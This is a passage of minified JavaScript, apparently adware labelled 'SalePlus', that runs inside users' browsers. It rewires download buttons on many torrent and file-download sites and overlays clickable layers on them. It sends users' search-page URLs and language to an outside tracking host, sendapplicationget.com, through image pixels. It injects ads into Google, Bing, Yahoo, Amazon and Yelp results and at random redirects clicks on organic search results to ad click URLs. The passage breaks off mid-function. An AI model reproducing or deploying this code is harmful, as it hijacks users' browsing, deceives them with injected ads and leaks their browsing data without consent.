e=n.utils.duplicateElement(h),\nk=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}h=n.utils.query_selector_all(\".play-button\")[0];\"undefined\"!==typeof h&&(e=n.utils.duplicateElement(h),k=h.parentNode,k.insertBefore(e,h),k.removeChild(h));h=n.utils.query_selector_all(\".download.step\")[0];\"undefined\"!==typeof h&&(e=n.utils.duplicateElement(h),k=h.parentNode,k.insertBefore(e,h),k.removeChild(h))}};this[\"myappsforpc.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".download-link\");if(\"undefined\"!==typeof h)for(var e=\n0;e<h.length;e++){var k=n.utils.duplicateElement(h[e]),l=h[e].parentNode;l.insertBefore(k,h[e]);l.removeChild(h[e])}}};this[\"telecharger.logiciel.net\"]=new function(){this.init=function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e],l=k.getAttribute(\"class\");if(null!=l&&-1<l.indexOf(\"action-button download\")){var l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"winmacsofts.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".btn.btn-primary.download-btn\"),\ne=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"telecharger.info\"]=new function(){this.init=function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e].getAttribute(\"title\");if(null!=k&&-1<k.indexOf(\"TELECHARGER \")){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"torntv-dl.net\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=\n0;e<h.length;e++){var k=h[e].getAttribute(\"onclick\");if(null!=k&&-1<k.indexOf(\"getDownload\")){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"1337x.to\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&-1<k.indexOf(\"/assets//images/1337x-1.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);\nm.removeChild(k.parentNode)}}}};this[\"h33t.to\"]=new function(){this.init=function(){for(var h=document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&(-1<k.indexOf(\"arrow_green.gif\")||-1<k.indexOf(\"arrow_white.gif\"))||-1<k.indexOf(\"button_direct.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"ahashare.com\"]=new function(){this.init=function(){for(var h=\ndocument.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&(-1<k.indexOf(\"magnit.png\")||-1<k.indexOf(\"noclient.png\"))){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"torrenthound.com\"]=new function(){this.init=function(){var h=document.getElementById(\"direct2\"),e=n.utils.duplicateElement(h),k=h.parentNode;k.insertBefore(e,h);k.removeChild(h)}};this[\"smartorrent.com\"]=\nnew function(){this.init=function(){for(var h=window.document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&-1<k.indexOf(\"/images/download_FR.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"torrentreactor.net\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".mrg.mrg-fifth\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),\nm=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"tomadivx.org\"]=new function(){this.init=function(){for(var h=window.document.getElementsByTagName(\"img\"),e=0;e<h.length;e++){var k=h[e].getAttribute(\"src\");if(null!=k&&-1<k.indexOf(\"/imagenes_web/descargar.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}}};this[\"opensubtitles.website\"]=new function(){this.init=function(){if(-1<window.location.href.indexOf(\"/opensubtitles-playe\")){var h=\ndocument.getElementById(\"divPlayerDesc\");if(null!=h){h.style.position=\"relative\";var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.zIndex=\"2000\";h.appendChild(e);if(h=h.children[0]){var k=h.children[0];k&&(k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\"))}}h=document.getElementById(\"divPlayerHead\");if(null!=h)for(var l=0;l<h.children.length;l++)if(\"span\"==h.children[l].tagName.toLowerCase()){var m=\nh.children[l],e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"106%\";e.style.height=\"70px\";e.style.cursor=\"pointer\";e.style.top=\"-50px\";e.style.left=\"-6%\";e.style.zIndex=\"2000\";if(k=m.children[0])k.setAttribute(\"href\",\"javascript:void(0);\"),k.setAttribute(\"target\",\"_self\");m.style.position=\"relative\";m.appendChild(e)}}}};this[\"downloads.info\"]=new function(){this.init=function(){for(var h=document.links,e=0;e<h.length;e++){var k=h[e],l=k.getAttribute(\"class\");if(null!=l&&\n-1<l.indexOf(\"action-button download\")){var l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}}};this[\"techypcapps.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"techmacho.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],\nl=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"techariot.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"androidlegend.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;\nm.insertBefore(l,k);m.removeChild(k)}}};this[\"technologyrush.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"notintricate.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};\nthis[\"techglen.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"updownload.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"techamiable.com\"]=new function(){this.init=\nfunction(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"appsforpcmero.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download-link\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"hugefiles.net\"]=new function(){this.init=function(){for(var h=window.document.getElementsByTagName(\"img\"),\ne=0;e<h.length;e++)if(h[e].src.indexOf(\"hugefiles.net/button.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);m.removeChild(k.parentNode)}}};this[\"go4up.com\"]=new function(){this.init=function(){setTimeout(function(){for(var h=window.document.getElementsByTagName(\"img\"),e=0;e<h.length;e++)if(h[e].src.indexOf(\"download-button.png\")){var k=h[e],l=n.utils.duplicateElement(k.parentNode),m=k.parentNode.parentNode;m.insertBefore(l,k.parentNode);\nm.removeChild(k.parentNode)}},1E3)}};this[\"descarga.benjaminstrahs.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download_link.btnDownloadAlt\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"installers.installm.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".download_link.btnDownloadAlt\"),e=0;e<h.length;e++){var k=h[e],l=n.utils.duplicateElement(k),m=k.parentNode;\nm.insertBefore(l,k);m.removeChild(k)}}};this[\"uptobox.com\"]=new function(){this.init=function(){var h=n.utils.query_selector_all(\".button_upload.green\");1>h.length&&(h=n.utils.query_selector_all(\".button_upload green\"));for(var e=0;e<h.length;e++){var k=h[e].parentNode,l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}}};this[\"torrentz.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".SimpleAcceptebleTextAds\"),e=0;e<h.length;e++){var k=\nh[e],l=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=document.getElementsByTagName(\"span\");if(0<h.length)for(e=0;e<h.length;e++)k=h[e].parentNode,h[e].getAttribute(\"style\")&&-1<h[e].getAttribute(\"style\").indexOf(\"green_arrow\")&&(l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k))}};this[\"torrentz.eu\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".SimpleAcceptebleTextAds\"),e=0;e<h.length;e++){var k=h[e],\nl=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=document.getElementsByTagName(\"span\");if(0<h.length)for(e=0;e<h.length;e++)k=h[e].parentNode,h[e].getAttribute(\"style\")&&-1<h[e].getAttribute(\"style\").indexOf(\"green_arrow\")&&(l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k))}};this[\"torrentsmirror.com\"]=new function(){this.init=function(){for(var h=n.utils.query_selector_all(\".SimpleAcceptebleTextAds\"),e=0;e<h.length;e++){var k=h[e],\nl=n.utils.duplicateElement(k),m=k.parentNode;m.insertBefore(l,k);m.removeChild(k)}h=document.getElementsByTagName(\"span\");if(0<h.length)for(e=0;e<h.length;e++)k=h[e].parentNode,h[e].getAttribute(\"style\")&&-1<h[e].getAttribute(\"style\").indexOf(\"green_arrow\")&&(l=n.utils.duplicateElement(k),m=k.parentNode,m.insertBefore(l,k),m.removeChild(k))}};this[\"isohunt.to\"]=new function(){this.init=function(){var h=document.links;for(i=0;i<h.length;i++)if(\"btn.btn-success.btn-lg\"===h[i].className||\"btn btn-success btn-lg\"===\nh[i].className){var e=document.createElement(\"div\");e.style.position=\"absolute\";e.style.width=\"100%\";e.style.height=\"100%\";e.style.cursor=\"pointer\";e.style.top=\"0\";e.style.left=\"0\";e.style.zIndex=\"2000\";var k=h[i].parentNode;k.appendChild(e);k.style.position=\"relative\"}}};this[\"lp.playerpage209.info\"]=new function(){this.init=function(){var h=document.createElement(\"script\");h.text=\"var a = document.getElementById('myModal');a.setAttribute('onclick', 'void(0);');\";n.utils.addScript(h)}};this[\"lp.playerpage214.info\"]=\nnew function(){this.init=function(){var h=document.createElement(\"script\");h.text=\"var a = document.getElementById('myModal');a.setAttribute('onclick', 'void(0);');\";n.utils.addScript(h)}};this.injectHidden=function(){var h=document.createElement(\"input\");h.type=\"hidden\";h.setAttribute(\"id\",\"sadkf345hks78923dkcvsdf\");document.getElementsByTagName(\"body\")[0].appendChild(h)};if(!document.getElementById(\"sadkf345hks78923dkcvsdf\"))if(\"undefined\"!==typeof this[location.host]&&this.activeZds[location.host]&&\nwindow.self==window.top&&1==this.activeZds[location.host])this[location.host].init(),this.injectHidden();else for(var v in this.activeZds)if(-1<location.host.indexOf(v)&&1==this.activeZds[v])try{this[v].init(),this.injectHidden()}catch(y){}};}catch(e){};try{window.top==window.self&&new function(){if(!document.getElementsByTagName(\"body\").length||!document.getElementsByTagName(\"body\")[0].getAttribute(\"s8438959027574575270\")){var m=document.getElementsByTagName(\"body\")[0];m&&m.setAttribute(\"s8438959027574575270\",\"1\");var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"SalePlus\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.sendPixels=function(a){var b;if(a instanceof Array)for(var e=0;e<a.length;e++){var f=a[e];b=new Image;b.src=f}else b=new Image,b.src=a};a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+ c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(b,d){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",b,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&d(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(b, d,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",b,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};d=encodeURIComponent(d);this.xhr.send(d)}};a.waitForTokens={};a.addScript=function(a,b){if(\"bing\"==b){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a); Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all(c);clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}}; a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all= document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f= this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"== navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href: \"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=8438959027574575270&eid=1307&pid=21153&prodid=186&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=FR&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+ b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()}, !1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&& (b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}, infospace:{hrefSelector:\".resultTitle\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://search.infospace.com/search/*\"],src_for_keyword:\"#topSearchTextBox\",validate:function(){b.utils.ping(\"validate2\");return!0}},wow:{hrefSelector:\".find\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"http://www.wow.com/search?*\"],src_for_keyword:\"#csbquery1\",validate:function(){b.utils.ping(\"validate2\");return!0}},duckduckgo:{hrefSelector:\".result__a\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://duckduckgo.com/?q=*\"],src_for_keyword:\"#search_form_input\", validate:function(){b.utils.ping(\"validate2\");return!0}},contenko:{hrefSelector:\"#title\",unique_search_divs:\"1\",dr:[\"\",\"\"],urls:[\"://contenko.com/#/?q=*\"],src_for_keyword:\"#searchBar input[type='text']\",validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}},ask:{hrefSelector:\".ptbs  a[id^=r]\",unique_search_divs:\"1\", urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\");if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"== a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"],src_for_keyword:\"#searchboxinput\", tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".widget-runway-pegman\")[0], !1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"],src_for_keyword:\"#twotabsearchtextbox\", validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild(c)},validate:function(){return!0}},superpages:{unique_search_divs:\"1\",urls:[\"http://yellowpages.superpages.com/listings.jsp?*\"],src_for_keyword:\"input[type='text']#what\", validate:function(){return!0}},yelp:{unique_search_divs:\"1\",urls:[\"http://www.yelp.com/search?find_desc=*\"],src_for_keyword:\"input#find_desc\",validate:function(){b.num_of_items_in_one=1;return!0}},yellowpages:{unique_search_divs:\"1\",urls:[\"http://www.yellowpages.com/search?search_terms=*\"],src_for_keyword:\"input[type='text']#query\",validate:function(){return!0}},info:{unique_search_divs:\"1\",urls:[\"http://www.info.com/search?*\"],src_for_keyword:\"input[type='text']#qkw0\",validate:function(){return!0}}, webcrawler:{unique_search_divs:\"1\",urls:[\"http://www.webcrawler.com/search/web?*\"],src_for_keyword:\"input[type='text']#topSearchTextBox\",validate:function(){return!0}},webssearches:{unique_search_divs:\"1\",urls:[\"http://search.webssearches.com/search/web?*\",\"http://istart.webssearches.com/web/?q=*\",\"http://istart.webssearches.com/web?q=*\"],src_for_keyword:[\"input[type='search']#topSearchTextBox\",\"input[type='text']#q\"],validate:function(){b.num_of_items_in_one=2;return!0}},mywebsearch:{unique_search_divs:\"1\", urls:[\"http://search.mywebsearch.com/mywebsearch/*\"],src_for_keyword:[\"input#q\"],validate:function(){return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e); g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b= 0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f= b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"== a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop(c))c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1, 1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)\"string\"===typeof a[b]&&(a[b]=a[b].replace(/\\\"/g,'\\\\\"'));return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&& (c=b.escape_chars_for_json(c));a=JSON.stringify(a);d=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}];for(var e=0;e<d.length;e++)a=a.replace(RegExp(\"\\\\[##\"+d[e].replace+\"##\\\\]\",\"g\"),d[e][\"with\"]);try{return\"undefined\"!==typeof c.pxl&&\"\"!==c.pxl&&b.utils.sendPixels(c.pxl),JSON.parse(a)}catch(f){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var 